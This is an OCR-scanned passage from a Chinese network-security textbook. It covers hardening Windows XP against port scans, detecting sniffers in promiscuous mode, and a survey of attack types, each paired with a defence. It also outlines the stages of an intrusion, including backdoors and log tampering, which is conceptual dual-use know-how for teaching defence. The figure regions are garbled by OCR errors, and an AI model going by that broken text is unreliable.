所 以 ,采取 适当 措施 来 防范 端口 扫描 是 防范 网 络 扫描 的 重点 。 下 面 以 Windows XP 为 例 , 介 


绍 一 下 端口 扫描 的 几 种 防范 措施 。 
1. 禁用 不 必要 的 端口 
一 般 来 说 , 仅 打 开 需 要 使 用 的 端口 会 比较 安全 ,不 过 关闭 端口 意味 着 减少 功能 ,所 以 需 
要 在 安全 和 功能 上 面 做 一 些 平衡 。 一 些 系统 必 要 的 通信 端口 ,如 访问 网 页 需要 HTTP(80 


端口 ) 不 能 被 关闭 。 对 于 那些 根本 用 不 到 的 功能 ,就 没 必要 将 端口 开放 给 黑客 。 


2. 禁用 不 必要 的 协议 
在 配置 系统 协议 时 ,将 不 需要 的 协议 全 部 删除 。 对 于 服务 器 和 主机 来 说 ,一 般 只 安装 


TCP/IP 就 够 了 。 

方法 是 : 右 击 * 网 络 邻居 ”, 选 择 * 属 性 ,然后 右 击 “本 地 连接 ”, 选 择 * 属 性 ”, 印 载 不 必要 
的 协议 。 对 于 协议 和 端口 的 限制 ,也 可 采用 以 下 方法 :“ 网 上 邻居 ”一 “属性 ”一 “本 地 连接 ”一 
“属性 ”>“Internet 协议 TCP/IP” 一 “属性 ”一 “高 级 ”一 “选项 ”>“TCP/IP 筛选 ”属性 ”， 
勾 选 “ 启 用 TCP/IP 筛选 ”, 只 允许 需要 的 TCP、UDP 端口 和 协议 即 可 ,如 图 4-26 所 示 。 


3. 禁用 NetBIOS 
绑 定 在 TCP/IP 的 NetBIOS 关闭 ,避免 针对 NetBIOS 的 攻击 。 
方法 是 : 选择 “网 络 邻居 ”, 右 击 选择 “属性 ”一 “TCP/IP 协议 ”一 “属性 ”一 “高 级 ”, 进 入 


NetBIOS 是 很 多 安全 缺陷 的 源泉 ,对 于 不 需要 提供 文件 和 打印 共享 的 主机 ,还 可 以 将 
“高 级 TCP/IP 设置 ?对 话 框 , 选 择 WINS 选项 卡 , 勾 选 “禁用 TCP/IP 上 的 NetBIOS” 一 项 ， 


关闭 NetBIOS, 如 图 4-27 所 示 。 


环 设 置 [oms [WIE ”| 进项 | 


"IHS 地 址 ( 按 使 用 恬 序 排列 ) QD) 


高 级 TCP/IP 设置 

EE 
E> 

淹 


如 果 启 用 LUINDSTS 搜索 ， 它 格 应 用 于 所 有 局 用 TCP/IP 的 连接 .。 
导入 LIMNDSTS 吧 ) 


回忆 用 LUIDsTS 查询 Q) 


〇 全 部 允许 如 
加 Rf 许 四 
WP 请 口 


〇 全 部 允许 E) 
只 化 许 


ICP 端口 


Ca 
确定 [_ 取消 


[CRv 
[EN| 
图 4-27 ”禁用 NetBIOS 


添加 . 
吉 除 


四 ) 
右 定 


4-26 限制 协议 和 端口 
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4. 禁用 不 必要 的 服务 
服务 开 的 多 可 以 给 管理 带 来 方便 ,但 开 的 太 多 也 存在 很 多 风险 ,特别 是 对 于 那些 管理 员 
都 用 不 到 的 服务 ,最 好 关 掉 , 免 得 给 系统 带 来 灾 TCP/IP WetBIOS Helper 的 属性 (本 地 计算 机 ) 回回 
难 。 图 4-28 以 TCP/IP NetBIOS Helper( 不 需要 「 和 本 了 优生] 依存 关系 ] 
文件 和 打印 共享 的 用 户 可 禁用 ) 为 例 ,禁用 服务 名 称 :Liozts 
TCP/IP 上 的 NetBIOS 服务 。 有 -二 
FD) 隐 汪 对 “TCPJIP 上 NetBI05 WetBT)” 职务 区 至 
首先 ,进入 控制 面板 的 “管理 工具 ”, 运 行 * 服 | sasasdm , 
务 ” ’ 村 开 “ 服 务 ” 窗 何 六 双击 右 便 列 表 中 需 要 禁 用 ESVWINOrS\systend2\svehost exe -LocalService 


的 服务 ,在 打开 的 服务 属性 的 “常规 "选项 卡 中 的 En Ei ~ 
“启动 类 型 "一 栏 中 选择 “已 禁用 ”, 最 后 确定 | 让 
即 可 。 FEED ED [了 CE 


禁用 其 他 不 必要 的 服务 方法 类 似 ,禁用 之 后 “| es， rivepsREiew. 
不 仅 能 保证 Windows 系统 的 安全 性 ,还 可 以 提 | ssw [| 
高 其 运行 速度 ,可 谓 一 举 两 得 。 


[mm | HE | WI) 
此 外 ,经 常 还 可 结合 其 他 措施 来 防范 网 络 扫 - 
描 , 如 入 侵 检测 系统 (IDS) 、 入 侵 防御 系统 (IPS) 图 4-28 ”禁用 服务 
和 网 络 协议 分 析 等 。 


综 上 所 述 ,网 络 扫描 并 没有 人 们 想象 得 那么 简单 ,需要 注意 很 多 细节 ,才能 够 避免 给 网 
络 造成 负面 影响 。 为 了 更 好 地 保护 网 络 , 需 要 积极 使 用 多 种 软件 和 技术 来 防范 恶意 的 网 络 
扫描 ,限制 恶意 扫描 能 抵达 的 范围 ,减少 恶意 扫描 所 能 获得 的 信息 。 


4.6.2 网 络 监听 的 检测 与 防范 


网 络 监听 很 难 被 发 现 , 因 为 运行 网 络 监听 的 主机 只 是 被 动 地 接收 在 局 域 网 上 传输 的 信 
息 , 不 主动 地 与 其 他 主机 交换 信息 ,也 没有 修改 在 网 上 传输 的 数据 包 。 攻 击 者 会 出 卖 利用 网 
络 监听 工具 得 到 的 某 些 重要 信息 ,或 者 根据 监听 到 的 信息 来 决定 下 一 步 采 取 什么 样 的 行动 。 
这 样 ,就 会 使 企业 或 用 户 上 蒙受 巨大 的 损失 。 所 以 ,网 络 监听 的 检测 与 防范 在 网 络 安全 中 也 是 
不 可 忽视 的 。 

1. 检测 网 络 监听 的 方法 

检测 单独 一 台 主 机 是 否 正在 被 监听 ,相对 来 说 是 比较 简单 的 。 可 以 通过 查看 系统 进程 ， 
或 者 通过 检查 网 络 接口 卡 的 工作 模式 是 否 为 混杂 模式 来 决定 是 否 已 经 被 监听 。 而 对 于 整个 
网 络 来 说 ,检测 就 要 复杂 得 多 。 下 面 介 绍 几 种 检测 网 络 监听 的 方法 。 

(1) 检查 网 络 接 口 卡 是 否 为 混杂 模式 (Promisc)。 要 想 监听 整个 网 络 中 的 报 文 , 需 将 网 
卡 工作 方式 设 为 混杂 模式 。 检 查 网 卡 是 否 工作 在 混杂 模式 的 方法 如 下 。 

在 Linux 系统 中 ,以 根 用 户 root 权限 进入 字符 终端 ,在 提示 符 下 输入 “ifconfig -a”, 可 显 
示 系 统 中 所 有 接口 卡 的 详细 信息 。 检 查 每 一 个 接口 所 显示 的 信息 , 当 发 现 某 一 个 接口 信息 
中 出 现 了 “PROMISC” 标 志 , 就 说 明 这 个 接口 卡 已 经 工作 在 混杂 模式 下 了 。 

在 Windows 系统 下 检查 网 卡 的 工作 模式 , 需 使 用 第 三 方 软件 。 如 PromiScan 软件 , 它 
可 以 在 Windows NT/2000/XP 系统 下 检测 出 网 卡 是 否 工 作 在 混杂 模式 下 。 
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但 是 ,有 些 监听 器 会 将 表示 网 卡 混杂 模式 的 字符 “PROMISC” 隐 藏 ,来 躲避 上 述 这 种 检 
测 方式 。 这 样 ,就 不 得 不 使 用 其 他 方法 来 检测 网 络 中 是 否 有 网 络 监听 器 在 运行 了 。 

(2) 监视 DNS Reverse Lookup。 一 些 监听 器 在 收 到 一 个 网 络 请 求 时 ,就 会 执行 DNS 
反 向 查询 ( 即 IP 地 址 到 域名 的 查询 ) , 试 着 将 IP 地 址 解释 为 主机 名 。 因 此 , 若 在 网 络 中 执行 
一 个 Ping 扫描 或 者 Ping 一 个 不 存在 的 IP 地 址 ,就 会 触发 这 种 活动 。 如 果 得 到 回应 ,就 说 
明 网 络 中 安装 有 网 络 监听 器 ,如 果 没 有 收 到 任何 回应 ,表明 没有 监听 器 在 运行 。 

(3) 发 送 一 个 带 有 网 络 中 不 存在 的 MAC 地址 的 广播 包 到 网 络 中 的 所 有 主机 。 正 常情 
况 下 ,网 络 中 的 主机 接口 卡 在 收 到 带 有 不 存在 的 MAC 地 址 的 数据 包 时 ,会 将 它 丢 弃 , 而 当 
某 台 主机 中 的 网 络 接口 卡 处 于 混杂 模式 时 , 它 就 会 回应 一 个 带 有 RST 标志 的 包 。 这 样 ,就 
可 以 认为 网 络 中 已 经 有 监听 器 在 运行 。 注 意 , 在 交换 网 络 环境 当中 ,由 于 交换 机 在 转发 广播 
包 时 不 需要 MAC 地 址 ,所 以 也 有 可 能 做 出 与 上 述 相同 的 响应 ,需要 根据 实际 情况 来 决定 。 

(4) 小 心 监控 网 络 中 各 种 交换 机 和 路 由 器 的 运行 情况 ,来 及 时 发 现 这 些 网 络 设备 出 现 
的 某 种 不 正常 的 现象 。 比 如 有 些 本 来 关闭 了 的 端口 又 被 启用 ,而 某 些 端口 连接 的 主机 在 运 
行 却 没有 流量 时 ,就 要 重新 登录 交换 机 或 路 由 器 ,仔细 查看 它 现 在 的 系统 设置 和 端口 设置 情 
况 , 并 和 之 前 的 记录 对 比 ,以 此 来 发 现 交换 机 或 路 由 器 是 否 已 经 被 入 侵 。 

(5) 使 用 Honeypot( 蜜 钢 ) 技 术 来 设计 一 个 陷阱 ,以 此 来 诱骗 攻击 者 对 它 进行 监听 ,并 
通过 它 来 找到 监听 的 源头 。 

(6) 监视 网 络 中 的 主机 ,经 常 查看 主机 中 的 硬盘 空间 是 否 增长 过 快 ,CPU 资源 是 否 消 
耗 过 多 ,系统 响应 速度 是 否 变 慢 ,以 及 系统 是 否 经 常 莫名 其 妙 地 断 网 等 。 

2. 网 络 监听 的 防范 措施 

1) 从 逻辑 或 物理 上 对 网 络 分 段 

网 络 分 段 通常 被 认为 是 控制 网 络 广播 风暴 的 一 种 基本 手段 ,但 其 实 也 是 保证 网 络 安全 
的 一 项 措施 。 其 目的 是 将 非法 用 户 与 敏感 的 网 络 资源 相互 隔离 ,从 而 防止 可 能 的 非法 监听 。 

2) 以 交换 式 集线器 代替 共享 式 集线器 

对 局 域 网 的 中 心 交换 机 进行 网 络 分 段 后 ,局 域 网 监听 的 危险 仍然 存在 。 这 是 因为 网 络 
终端 用 户 的 接 入 往往 是 通过 分 支 集线器 而 不 是 中 心 交换 机 ,而 使 用 最 广泛 的 分 支 集线器 通 
常 是 共享 式 集线器 。 这 样 , 当 用 户 与 主机 进行 数据 通信 时 ,两 台 机 器 之 间 的 数据 包 ( 称 为 单 
播 包 Unicast Packetb) 还 是 会 被 同一 台 集 线 器 上 的 其 他 用 户 所 监听 。 因 此 ,应 该 以 交换 式 集 
线 器 代替 共享 式 集线器 ,使 单 播 包 仅 在 两 个 结 点 之 间 传 送 , 从 而 防止 非法 监听 。 当 然 ,交换 
式 集线器 只 能 控制 单 播 包 而 无 法 控制 广播 包 (Broadcast Packet) 和 多 播 包 (Maulticast 
Packet)。 但 广播 包 和 多 播 包 内 的 关键 信息 ,要 远 远 少 于 单 播 包 。 

3) 使 用 加 密 技术 

数据 经 过 加 密 后 ,通过 监听 仍然 可 以 得 到 传送 的 信息 .但 显示 的 是 乱码 。 使 用 加 密 技术 
的 缺点 是 影响 数据 传输 速度 以 及 使 用 一 个 弱 加 密 术 比较 容易 被 攻破 。 系 统管 理 员 和 用 户 需 
要 在 网 络 速度 和 安全 性 上 进行 折 中 选择 。 由 于 网 络 监听 属于 被 动 地 窃取 ,通过 数据 加 密 技 
术 ,是 最 好 的 防范 监听 的 手段 。 

4) 划分 VLAN 

运用 VLAN( 虚 拟 局 域 网 ) 技 术 . 将 以 太 网 通信 变 为 点 到 点 通信 ,可 以 防止 大 部 分 基于 
网 络 监听 的 入 侵 。 
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本 章 学 习 要 求 : 

。 了 解 网 络 攻击 的 概念 、 种 类 以 及 攻击 步骤 。 
。 熟悉 常见 网 络 攻 击 的 技术 。 

。 了 解 网 络 攻击 的 相关 原理 及 其 方法 。 

。 掌握 各 种 网 络 攻击 的 防范 方法 。 


5.1 网 络 攻击 概述 


5.1.1 网 络 攻 击 的 概念 


随 着 Internet 的 日 益 普 及 ,进入 网 络 的 计算 机 数量 迅速 增加 ,网 络 的 入侵 问题 也 随 之 突 
显 。 所 谓 网 络 的 人 侵 是 指 对 接 人 网 络 的 计算 机 系统 的 非法 入 侵 , 即 攻击 者 未 经 合法 的 手段 
和 程序 而 取得 了 使 用 该 系统 资源 的 权限 。 网 络 入侵 的 目的 有 多 种 : 或 者 是 取得 使 用 系统 的 
存储 能 力 、 处 理 能 力 以 及 访问 其 存储 内 容 的 权限 ; 或 者 是 作为 进入 其 他 系统 的 跳板 ; 或 者 
是 想 破 坏 这 个 系统 (使 其 毁坏 或 丧失 服务 能 力 ) 。 网 络 人 侵 是 目前 最 受 关注 .也 是 影响 最 大 
的 网 络 攻击 行为 ,但 是 网 络 攻击 并 不 仅 有 网 络 信 侵 一 种 ,网 络 攻击 是 指 对 网 络 系统 的 机 密 
性 、 完 整 性 ,可 用 性 、 可 控 性 和 抗 抵赖 性 产生 危害 的 行为 。 这 些 行为 可 抽象 地 分 为 4 个 基本 
情形 : 信息 泄漏 攻击 、 完 整 性 破坏 攻击 ,拒绝 服务 攻击 和 非法 使 用 攻击 。 


5.1.2 网 络 攻 击 的 分 类 


网 络 攻 击 的 方式 不 同 , 产 生 的 攻击 类 型 不 同 ,最 后 导致 的 攻击 结果 也 不 同 。 

从 攻击 的 方式 来 看 ,有 利用 系统 本 身 的 漏洞 进行 的 攻击 .有 利用 各 种 命令 和 工具 进行 的 
攻击 ,有 利用 虚假 的 IP 地址 进行 欺骗 性 的 攻击 ,有 利用 恶意 代码 或 病毒 进行 的 攻击 ,也 有 利 
用 网 络 部 署 的 缺陷 和 防范 措施 的 不 到 位 进行 的 攻击 。 

从 攻击 的 类 型 来 看 ,有 通过 单个 计算 机 进行 的 攻击 ,也 有 通过 控制 僵尸 网 络 以 多 个 计算 
机 进行 的 攻击 ; 有 间 敬 式 的 攻击 ,也 有 连续 式 的 不 间断 的 攻击 ; 有 隐秘 的 攻击 ,也 有 非 隐秘 
式 的 攻击 。 

从 攻击 导致 的 结果 来 看 , 轻 者 导致 受 攻击 者 运行 速度 变 慢 , 无 法 提供 正常 的 服务 , 重 者 
系统 崩溃 。 

通过 将 攻击 的 方式 与 攻击 类 型 相 结合 ,攻击 类 型 主要 有 拒绝 服务 攻击 、 分 布 式 拒绝 服务 
攻击 、 利 用 型 攻击 、 信 息 收 集 型 攻击 和 假 消息 攻击 等 。 

1. 拒绝 服务 攻击 


拒绝 服务 (Denial of Service,DoS) 攻 击 是 目前 最 常见 的 一 种 攻击 类 型 。 从 网 络 攻击 的 
各 种 方法 和 所 产生 的 破坏 情况 来 看 ,DoS 算是 一 种 很 简单 但 又 很 有 效 的 进攻 方式 。 它 的 


104 网 络 安全 教程 及 实践 


目的 就 是 拒绝 用 户 的 服务 访问 ,破坏 组 织 的 正常 运行 ,最 终 使 网 络 连 接 堵塞 ,或 者 服务 器 
因 疲 于 处 理发 送 者 发 送 的 数据 包 而 使 服务 器 系统 的 相关 服务 崩溃 ,无 法 给 合法 用 户 提供 
服务 。 

DoS 攻击 的 基本 过 程 为 : 首先 攻击 者 向 服务 器 发 送 众多 的 带 有 虚假 地 址 的 请 求 , 服 务 
器 发 送 回复 信息 后 等 待 回 传 信息 ,由 于 地 址 是 伪造 的 ,所 以 服务 器 一 直 等 不 到 回 传 的 消息 ， 
分 配给 这 次 请 求 的 资源 就 始终 没有 被 释放 。 当 服务 器 等 待 一 定 的 时 间 后 ,连接 会 因 超时 而 
被 切断 ,攻击 者 会 再 度 传送 新 的 一 批 请 求 , 在 这 种 反复 发 送 伪 地 址 请 求 的 情况 下 ,服务 器 资 
源 最 终 会 被 耗 尽 。 

常见 的 DoS 攻击 主要 有 以 下 几 种 类 型 。 

(1) 死亡 之 ping(ping of death) ; 

(2) 泪 滴 (CTeardrop); 

(3) UDP 洪水 CUDP flood) ; 

(4) SYN 洪水 (SYN flood) ; 

(5) Land 攻击 ; 

(6) Smurf 攻击 ; 

(7) Fraggle 攻击 ; 

(8) 电子 邮件 炸弹 ; 

(9) 畸形 消息 攻击 。 

对 于 这 些 攻击 方式 的 介绍 以 及 防御 方法 在 以 下 章节 将 有 详细 说 明 。 

2. 利用 型 攻击 

利用 型 攻击 是 一 类 试图 直接 对 用 户 的 机 器 进行 控制 的 攻击 ,最 常见 的 有 以 下 三 种 。 

1) 口令 猜测 

一 旦 黑客 识别 了 一 台 主 机 而 且 发 现 了 基于 NetBIOS Telnet 或 NFS 这 样 的 服务 的 可 利 
用 的 用 户 账号 ,成 功 的 口令 猜测 能 提供 对 机 器 控制 。 

防御 : 要 选用 难以 猜测 的 口令 ,比如 词 和 标点 符号 的 组 合 。 确 保 像 NFS、NetBIOS 和 
Telnet 这 样 可 利用 的 服务 不 暴露 在 公共 范围 。 如 果 该 服务 支持 锁定 策略 ,就 进行 锁定 。 

2) 特洛伊 木马 

特洛伊 木马 是 一 种 或 是 直接 由 一 个 黑客 .或 是 通过 一 个 不 会 令 人 起 疑 的 用 户 秘密 安 
装 到 目标 系统 的 程序 。 一 旦 安装 成 功 并 取得 管理 员 权 限 ,安装 此 程序 的 人 就 可 以 直接 远 
程控 制 目标 系统 。 最 有 效 的 一 种 叫做 后 门 程序 ,恶意 程序 包括 NetBus、BackOrifice 和 
BO2k, 用 于 控制 系统 的 良性 程序 如 NetCat、VNC、pcAnywhere。 理 想 的 后 门 程序 应 该 透 
明 运 行 。 

防御 : 避免 下 载 可 疑 程序 并 拒绝 执行 ,运用 网 络 扫描 软件 定期 监视 内 部 主机 上 的 TCP 
服务 。 

3) 缓冲 区 溢出 

由 于 在 很 多 的 服务 程序 中 大 意 的 程序 员 使 用 像 与 strcpy() 和 strcat() 类 似 的 不 进行 有 
效 位 检查 的 函数 ,最 终 可 能 导致 恶意 用 户 编写 一 小 段 利用 程序 来 进一步 打开 安全 项 口 然后 
将 该 代码 缀 在 缓冲 区 有 效 载荷 末尾 ,这 样 , 当 发 生 缓冲 区 溢出 时 ,返回 指针 指向 恶意 代码 , 系 
统 的 控制 权 就 会 被 夺取 。 
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防御 : 利用 SafeLib Tripwire 这 样 的 程序 保护 系统 ,或 者 浏览 最 新 的 安全 公告 不 断 更 
新 操作 系统 。 

3. 信息 收集 型 攻击 

信息 收集 型 攻击 并 不 对 目标 本 身 造成 危害 ,但 这 类 攻击 会 为 进一步 和 人 侵 提供 有 用 的 信 
息 。 主 要 包括 扫描 技术 、 体 系 结构 刺探 和 利用 信息 服务 等 。 

1) 地 址 扫描 

运用 ping 这 样 的 程序 探测 目标 地 址 ,对 此 做 出 响应 的 表示 其 存在 。 

防御 : 在 防火 墙 上 过 滤 掉 ICMP 应 答 消息 。 

2) 端口 扫描 

通常 使 用 一 些 软 件 ,向 大 范围 的 主机 连接 一 系列 的 TCP 端口 ,扫描 软件 报告 它 成 功 地 
建立 了 连接 的 主机 所 开放 的 端口 。 

防御 : 许多 防火 墙 能 检测 到 是 否 被 扫描 ,并 自动 阻 断 扫描 企图 。 

3) 反 向 映射 

黑客 向 主机 发 送 虚 假 消息 ,然后 根据 返回 "host unreachable” 这 一 消息 特征 判断 出 哪些 
主机 是 存在 的 。 目 前 由 于 正常 的 扫描 活动 容易 被 防火 墙 侦 测 到 ,黑客 转 而 使 用 不 会 触发 防 
火 墙 规 则 的 消息 类 型 ,这 些 消息 类 型 包括 RESET 消息 .SYN-ACK 消息 .DNS 响应 包 。 

防御 : NAT 和 非 路 由 代理 服务 器 能 够 自动 抵御 此 类 攻击 ,也 可 以 在 防火 墙 上 过 滤 
“host unreachable”ICMP 应 答 。 

4) 慢 速 扫描 

由 于 一 般 扫描 侦 测 器 的 实现 是 通过 监视 某 个 时 间 帧 里 一 台 特 定 主 机 发 起 的 连接 的 数目 
(例如 每 秒 10 次 ) 来 决定 是 否 在 被 扫描 ,这 样 黑客 可 以 通过 使 用 扫描 速度 慢 一 些 的 扫描 软件 
进行 扫描 。 

防御 : 通过 引诱 服务 来 对 慢 速 扫描 进行 侦 测 。 

5) 体系 结构 探测 

黑客 使 用 具有 已 知 响应 类 型 的 数据 库 的 自动 工具 ,对 来 自 目标 主机 的 、 对 坏 数据 包 传送 
所 做 出 的 响应 进行 检查 。 由 于 每 种 操作 系统 都 有 其 独特 的 响应 方法 (例如 Windows NT 和 
Solaris 的 TCP/IP 堆栈 具体 实现 有 所 不 同 ) ,通过 将 此 独特 的 响应 与 数据 库 中 的 已 知 响应 
进行 对 比 ,黑客 经 常 能 够 确定 出 目标 主机 所 运行 的 操作 系统 。 

防御 : 去 掉 或 修改 各 种 Banner, 包 括 操作 系统 和 各 种 应 用 服务 的 Banner, 阻 断 用 于 识 
别 的 端口 ,扰乱 对 方 的 攻击 计划 。 

6) DNS 域 转换 

DNS 协议 不 对 转换 或 信息 性 的 更 新 进行 身份 认证 ,这 使 得 该 协议 被 他 人 以 一 些 不 同 的 
方式 加 以 利用 。 如 果 你 维护 着 一 台 公共 的 DNS 服务 器 ,黑客 只 需 实施 一 次 域 转换 操作 就 能 
得 到 你 所 有 主机 的 名 称 以 及 内 部 IP 地 址 。 

防御 : 在 防火 墙 处 过 滤 掉 域 转换 请 求 。 

7) Finger 服务 

黑客 使 用 finger 命令 来 刺探 一 台 finger 服务 器 以 获取 关于 该 系统 的 用 户 信息 。 

防御 : 关闭 finger 服务 并 记录 尝试 连接 该 服务 的 对 方 IP 地 址 ,或 者 在 防火 墙 上 进行 
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8) LDAP 服务 

黑客 使 用 LDAP 罕 探 网 络 内 部 的 系统 和 它们 的 用 户 信息 。 

防御 : 对 于 刺探 内 部 网 络 的 LDAP 进行 阻 断 并 记录 ,如果 在 公共 机 器 上 提供 LDAP 服 
务 ,那么 应 把 LDAP 服务 器 放 入 DMZ。 

4. 假 消息 攻击 

用 于 攻击 目标 配置 不 正确 的 消息 ,主要 包括 : DNS 高 速 缓 存 污 染 、 伪 造 电 子 邮 件 。 

1) DNS 高 速 缓存 污染 

由 于 DNS 服务 器 与 其 他 名 称 服务 器 交换 信息 的 时 候 并 不 进行 身份 验证 ,这 就 使 得 黑客 
可 以 将 不 正确 的 信息 摊 进 来 并 把 用 户 引 向 黑客 自己 的 主机 。 

防御 : 在 防火 墙 上 过 滤 入 站 的 DNS 更 新 ,外 部 DNS 服务 器 不 应 能 更 改 内 部 服务 器 对 
内 部 机 器 的 识别 。 

2) 伪造 电子 邮件 

由 于 SMTP 并 不 对 邮件 的 发 送 者 的 身份 进行 鉴定 ,因此 黑客 可 以 对 内 部 客户 伪造 电子 
邮件 ,声称 是 来 自 某 个 客户 .声称 是 认识 并 能 取得 信任 的 人 ,邮件 可 能 附带 上 可 安装 的 特 洛 
伊 木马 程序 ,或 者 是 一 个 引 向 恶意 网 站 的 链接 。 

防御 : 使 用 PGP 等 安全 工具 并 安装 电子 邮件 证 书 。 


5.1.3 网络 攻击 的 一 般 过 程 


了 解 网 络 攻 击 过 程 ,知己 知 彼 ,可 以 更 好 地 做 好 网 络 安全 防范 工作 。 通 过 总 结 ,可 以 将 
网 络 攻 击 归纳 为 以 下 8 个 步骤 。 

(1) 攻击 者 的 身份 和 位 置 隐藏 : 利用 被 侵入 的 主机 作为 跳板 ,如 在 安装 Windows 的 计 
算 机 内 利用 WinGate 软件 作为 跳板 ,利用 配置 不 当 的 Proxy 作为 踏板 、 电 话 转 接 技术 、 资 用 
他 人 的 账号 ,代理 ,伪造 IP 地 址 \、 假 冒 用 户 账号 。 

(2) 收集 攻击 目标 信息 : 主要 方法 有 口令 攻击 、 端 口 扫描 ,漏洞 检测 、 对 目标 系统 进行 
整体 安全 性 分 析 ,还 可 利用 如 ISS、.SATAN 和 Nessus 等 报告 软件 来 收集 目标 信息 。 

(3) 挖掘 漏洞 信息 : 常用 的 技术 有 系统 或 应 用 服务 软件 漏洞 .主机 信任 关系 漏洞 .目标 
网 络 的 使 用 者 漏洞 .通信 协议 漏洞 和 网 络 业务 系统 漏洞 。 

(4) 获取 目标 访问 权限 : 通过 一 切 办 法 获得 管理 员 口 令 。 

(5) 隐蔽 攻击 行为 : 包括 连接 隐藏 .进程 隐藏 和 文件 隐藏 等 。 

(6) 实施 攻击 : 攻击 主要 包括 修改 删除 重要 数据 ,窃听 敏感 数据 .停止 网 络 服务 和 下 载 
敏感 数据 等 。 

(7) 开辟 后 门 : 主要 有 放宽 文件 许可 权 、 重 新 开放 不 安全 的 服务 如 TFTP 等 .修改 系统 
的 配置 如 系统 启动 文件 ,替换 系统 本 身 的 共享 库 文件 .修改 系统 的 源 代码 ,安装 各 种 特洛伊 
木马 .安装 Sniffers 和 建立 隐蔽 信道 等 。 

(8) 清除 攻击 痕迹 : 主要 方法 有 算 改 日 志文 件 中 的 审计 信息 、 改 变 系统 时 间 造 成 日 志 
文件 数据 亲 乱 以 迷惑 系统 管理 员 、 删 除 或 停止 审计 服务 进程 干扰 入 侵 检 测 系统 正常 运行 和 
修改 完整 性 检测 标签 等 。 
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5.2 常见 网 络 攻击 技术 及 其 防范 方法 


目前 网 络 安全 研究 趋向 于 攻防 结合 ,追求 动态 安全 。 研 究 黑客 常用 攻击 手段 和 工具 必 
然 为 防御 技术 提供 启示 和 思路 。 研 究 黑 客 攻 击 手段 并 利用 这 些 攻击 手段 和 工具 对 网 络 进 行 
模拟 攻击 , 找 出 网 络 的 安全 漏洞 也 成 为 网 络 安全 维护 手段 的 一 个 重要 组 成 部 分 。 下 面 将 介 
绍 一 些 常 见 的 网 络 攻击 技术 及 其 防范 方法 。 


5.2.1 口令 入 侵 及 其 防范 方法 


所 谓 口令 入 侵 是 指使 用 某 些 合法 用 户 的 账户 和 口令 登录 到 目的 主机 ,然后 再 实施 攻击 
活动 。 这 种 方法 的 前 提 是 必须 先 得 到 该 主机 上 的 某 个 合法 用 户 的 账号 ,然后 再 对 合法 用 户 
的 口令 进行 破译 。 不 过 攻击 者 已 大 量 采用 一 种 可 以 绕 开 或 屏蔽 口令 保护 的 程序 来 完成 这 项 
工作 。 对 于 那些 可 以 解 开 或 屏蔽 口令 保护 的 程序 通常 称 为 Crack。 但 实际 上 ,真正 的 加 密 
口令 是 很 难 逆向 破解 的 。 

1. 口令 入 侵 的 方法 

(1) 暴力 破解 。 暴 力 破 解 基 本 上 是 一 种 被 动 攻 击 的 方式 。 黑 客 在 知道 用 户 的 账号 后 ， 
利用 一 些 专门 的 软件 强行 破解 用 户口 令 ,这 种 方法 不 受 网 段 限制 ,但 需要 有 足够 的 耐心 和 时 
间 。 这 些 工具 软件 可 以 自动 地 从 黑客 字典 中 取出 一 个 单词 ,作为 用 户 的 口令 输入 给 远 端的 
主机 ,申请 进入 系统 ,但 是 这 样 也 容易 因为 网 络 数据 流量 和 访问 异常 而 被 网 络 管理 员 发 现 。 

(2) 登录 界面 攻击 法 。 黑 客 可 以 在 被 攻击 的 主机 上 ,利用 程序 伪造 一 个 登录 界面 ,以 骗 
取 用 户 的 账号 和 密码 。 当 用 户 在 这 个 伪造 界面 上 输入 登录 信息 后 ,程序 可 将 用 户 的 输入 信 
息 记 录 并 传送 到 黑客 的 主机 ,然后 关闭 界面 ,给 出 提示 信息 “系统 故障 ?或 “输入 错误 ”, 要 求 
用 户 重新 登录 。 重 新 出 现 的 登录 界面 才 是 系统 真正 的 登录 界面 。 

(3) 网 络 监听 。 黑 客 可 以 通过 网 络 监听 非法 得 到 用 户 的 口令 ,这 类 方法 有 一 定 的 局 限 
性 ,但 危害 性 极 大 。 由 于 很 多 网 络 协议 根本 就 没有 采取 任何 加 密 或 身份 认证 技术 ,如 在 
Telnet FTP .HTTP、SMTP 等 传输 协议 中 ,用 户 账号 和 密码 信息 都 是 以 明文 格式 传输 的 ,此 时 
若 黑 客 利用 数据 包 截取 工具 便 可 很 容易 地 收集 到 用 户 的 账号 和 和 密码。 另外 ,黑客 有 时 还 会 利 
用 软件 和 硬件 工具 时 刻 监视 系统 主机 的 工作 ,等 待 记录 用 户 登录 信息 ,从 而 取得 用 户 密码 。 

(4) 直接 侵入 网 络 服务 器 ,获得 服务 器 上 的 用 户口 令 文件 后 ,用 暴力 破解 程序 对 口令 文 
件 破译 ,以 获得 用 户口 令 。 像 在 UNIX 系统 中 ,用 户口 令 一 般 都 存储 在 Shadow 文件 中 ， 
Windows 系统 中 则 是 存储 在 sam 文件 内 ,攻击 者 侵入 服务 器 后 只 要 获得 这 些 文件 ,就 可 以 
用 反 编译 的 方法 将 这 些 文件 内 存储 的 用 户 资料 还 原 出 来 。 这 种 方法 是 所 有 的 方法 中 危害 最 
大 的 ,一 是 它 不 需要 一 遍 一 遍地 访问 服务 器 而 引起 网 络 异 常 , 从 而 被 管理 员 所 发 现 ; 二 是 操 
作 系 统 的 文件 记录 方式 很 容易 被 反 编译 破解 ; 三 是 一 旦 口令 文件 被 破解 ,那么 这 个 服务 器 
上 的 所 有 用 户 资料 都 将 暴露 在 攻击 者 面前 。 

2. 防范 口令 入 侵 攻 击 的 方法 

防范 口令 入 侵 比 较 好 的 方法 主要 如 下 。 

(1) 良好 的 口令 设置 是 防范 口令 入 侵 最 基本 、 最 有 效 的 方法 。 口令 设置 最 好 是 数字 、 字 
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母 、 标 点 符号 .特殊 字符 的 随意 组 合 ,英文 字母 可 采用 大 小 写 混合 排列 的 方式 ,口令 长 度 应 达 
到 8 位 以 上 。 

(2) 注意 保护 口令 安全 。 主 要 是 注意 使 用 口令 的 物理 安全 。 

(3) 保证 系统 的 安全 ,安装 补丁 ,关闭 不 必要 的 服务 和 端口 。 

(4) 在 Windows 系统 中 ,可 以 通过 设置 密码 最 长 期 限 、 最 短 密码 长 度 、 最 短 密码 期 限 、 
密码 唯一 性 、 账 号 锁定 等 安全 的 密码 策略 来 进行 设置 ,也 可 以 启动 “用 户 必须 登录 方 能 更 改 
密码 ”的 选项 ,提高 抗 口令 猜测 攻击 的 能 力 。 


5.2.2 网 络 扫描 技术 及 其 防范 方法 


1. 网 络 扫描 技术 的 基本 原理 

网 络 扫描 及 防范 措施 在 第 4 章 进行 了 简要 的 介绍 ,此 处 进行 详细 论述 。 

